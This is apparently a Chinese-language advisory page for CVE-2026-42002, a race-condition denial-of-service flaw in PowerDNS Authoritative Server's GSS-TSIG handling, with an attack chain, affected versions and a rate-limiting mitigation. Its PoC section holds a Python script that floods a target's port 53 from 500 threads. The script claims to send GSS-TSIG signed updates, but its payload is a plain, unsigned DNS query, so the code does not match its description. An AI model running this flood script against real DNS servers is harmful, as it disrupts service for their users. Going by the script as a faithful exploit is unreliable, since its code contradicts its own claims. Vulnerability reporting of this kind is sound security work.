CVE-2026-42002 CVSS 5.9 中危

CVE-2026-42002 PowerDNS GSS-TSIG并发拒绝服务漏洞

披露日期: 2026-05-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42002

漏洞类型

竞态条件

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PowerDNS Authoritative Server

漏洞概述

PowerDNS Authoritative Server的GSS-TSIG实现中存在并发与锁定缺陷。未经身份验证的攻击者可利用此漏洞，通过网络向服务器发送特制的并发请求。由于资源锁定机制存在缺陷，这可能导致竞态条件，进而引发服务拒绝响应或崩溃。该漏洞无需用户交互即可被利用，对服务的可用性造成严重影响。

技术细节

该漏洞的核心在于PowerDNS处理GSS-TSIG（通用安全服务算法下的事务签名）动态更新请求时的并发控制机制存在缺陷。具体而言，当多个更新请求同时到达并尝试访问共享内存区域或特定资源时，锁机制未能正确同步，导致竞态条件。攻击者可通过精心构造的并发网络数据包触发该逻辑漏洞。虽然攻击复杂度较高，但一旦成功，将导致DNS服务进程进入死锁状态或异常终止。由于CVSS向量显示C:N/I:N/A:H，此漏洞主要影响可用性，不会导致信息泄露或完整性破坏，但会造成严重的DNS解析服务中断。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别开启GSS-TSIG功能的PowerDNS Authoritative Server。

STEP 2

构造并发请求

攻击者编写脚本，构造特制的DNS动态更新数据包，准备并发发送。

STEP 3

触发竞态条件

攻击者向目标服务器发送大量并发请求，利用锁定机制的缺陷。

STEP 4

拒绝服务

服务器处理逻辑发生死锁或崩溃，导致DNS解析服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-42002: PowerDNS GSS-TSIG Race Condition
# This script sends concurrent GSS-TSIG signed updates to trigger the locking defect.

import socket
import threading
import time

TARGET_IP = "127.0.0.1"
TARGET_PORT = 53
PAYLOAD = b"\x00\x1e\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03example\x03com\x00\x00\x06\x00\x01" # Simplified DNS packet structure

def send_packet():
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(PAYLOAD, (TARGET_IP, TARGET_PORT))
        sock.close()
    except Exception as e:
        print(f"Error sending packet: {e}")

def main():
    print(f"[*] Starting DoS attack against {TARGET_IP}:{TARGET_PORT}...")
    threads = []
    # Spawn multiple threads to simulate concurrency and race condition
    for i in range(500):
        t = threading.Thread(target=send_packet)
        threads.append(t)
        t.start()
    
    for t in threads:
        t.join()
    
    print("[*] Attack packets sent.")

if __name__ == "__main__":
    main()

影响范围

PowerDNS Authoritative Server 4.8.x

PowerDNS Authoritative Server 4.7.x

PowerDNS Authoritative Server < 4.9.0

防御指南

临时缓解措施

在防火墙或负载均衡器层面限制来自单个IP的并发连接数和请求速率，减轻竞态条件被触发的概率，直至完成补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表